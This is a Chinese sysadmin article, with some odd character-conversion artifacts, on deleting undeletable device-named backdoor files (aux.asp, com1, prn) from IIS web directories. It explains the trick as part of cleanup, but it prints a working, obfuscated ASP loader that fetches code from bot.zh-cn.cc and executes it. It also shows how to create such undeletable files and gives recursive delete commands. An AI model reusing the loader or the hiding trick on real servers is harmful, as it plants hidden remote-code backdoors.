com1/lpt1/prn/nul 木馬后門處理方法集合
rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F
<%
'by*aming
dim amxml,amtxt,amado
amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&"/"&"b"&"o"&"t"&"/"&"c"&"o"&"n"&"f"&"i"&"g"&"."&"t"&"x"&"t"
Set amxml=CreateObject("Microsoft.XMLHTTP")
amxml.Open "Get",amtxt,False,"",""
amxml.setRequestHeader "User-Agent",amtxt
amxml.Send
set amado=Server.CreateObject("adodb.stream")
amado.Type=1
amado.Mode=3
amado.Open
amado.Write amxml.ResponseBody
amado.Position=0
amado.Type=2
amado.Charset="gb2312"
execute(amado.ReadText)
amado.Close
set amado=nothing
Set amxml=nothing
%>
近期有朋友發(fā)現(xiàn)自己的網(wǎng)站目錄下多出許多類似 aux.asp com1.gupiao.asp 的文件或文件夾,無法刪除!這類文件為何無法刪除,怎樣建立無法刪除的文件,又如何刪除 aux.asp 這類 無法刪除的文件 呢?
在服務器中 文件夾選項 - 查看 -隱藏受保護的操作系統(tǒng)文件后可看到此類文件屬性均為RHSA系統(tǒng)文件,無法刪除、修改、移動。
Windows 下不能夠以下面這些字樣來命名文件/文件夾,包括:aux、com1、com2、prn、con、nul 等,因為這些名字都屬于設備名稱,等價于一個 DOS 設備,如果我們把文件命名為這些名字,Windows 就會誤以為發(fā)生重名,所以會提示“不能創(chuàng)建同名的文件”。
當然,有一些特殊的方法可以投機取巧,建立以這些設備名為名的文件夾,比如我們在命令提示符下執(zhí)行“md E:\COM1\\”,就在E盤建了一個名叫 COM1 的文件夾。此文件夾雖然可以訪問,也可以建立子文件夾,但卻無法刪除,在系統(tǒng)看來,這個 COM1文件夾就是設備。
那么,如何刪除aux、com1等文件/文件夾呢?我們只要按照完整的 UNC 路徑格式,就是網(wǎng)上鄰居的路徑格式,正確輸入文件路徑及文件名即可。比如要刪除E 盤下的 aux 文件夾,可在命令提示符下執(zhí)行:rd /s \\.\E:\aux,rd 帶上/s 參數(shù)表示從所有子目錄刪除指定文件。再比如要刪除 E 盤 aux文件夾下的 nul.exe 文件,在命令提示符下執(zhí)行:del \\.\E:\aux\nul.exe 即可。
采用del \\.\E:\PRN\aux.asp:.jpg的方式,失敗了,最后將其他jpg文件移走,使用rd方式刪除整個目錄 看圖:
注意尾部加“\\”不然會出現(xiàn)正常文件夾也出現(xiàn)如圖中的1文件夾無法訪問的情況,重啟后文件夾才會消失。
其他這種文件的刪除特殊文件資料。
可以在dos中刪除,在開始輸入以下命令:
下面是刪除test用戶中的null目錄中所有內(nèi)容
echo y|rmdir \\.\D:\freehost\test\web\nul /s
如果有一些特殊文件,如aux.com.asp無法刪除,只能先備份用戶的web目錄(備份時不要選中有問題的文件),再用以下命令刪除web目錄所有內(nèi)容:
echo y|rmdir \\.\D:\freehost\test\web /s
要建立這類無法刪除文件的方法也很簡單:
copy 123.txt \\.\d:\aux.asp
建立不可刪除的文件夾:
md \\.\d:\prn\\
要刪除這類‘無法刪除的文件'也是有辦法的,如:d:\wwwroot\web\www 是包含這些無法刪除文件的目錄。在執(zhí)行命令前,把文件夾中需要備份的程序先移動到其他位置,然后使用以下命令可以刪除。
rmdir \\.\d:\wwwroot\web\www /s /q
也可以使用下面的命令直接刪除這些文件:
del \\.\d:\wwwroot\web\www\aux.asp
相關文章
win2008 IIS7無后綴URL部署問題 MVC4 MVC URL映射
這篇文章主要介紹了win2008 IIS7無后綴URL部署問題 MVC4 MVC URL映射,需要的朋友可以參考下2015-11-11Windows server 2008 R2 多用戶遠程桌面配置詳解(超過兩個用戶)
這篇文章主要介紹了Windows server 2008 R2 多用戶遠程桌面配置詳解(超過兩個用戶),需要的朋友可以參考下2018-05-05IIS7.5中神秘的ApplicationPoolIdentity介紹
這篇文章主要介紹了IIS7.5中神秘的ApplicationPoolIdentity介紹,需要的朋友可以參考下2015-05-05WIN7下網(wǎng)站用localhost可以訪問改為ip不可訪問如何解決
iis發(fā)布的網(wǎng)站用localhost可以訪問,改成IP就無法訪問該怎么解決,本文提供解決方法,需要的朋友可以參考下2012-12-12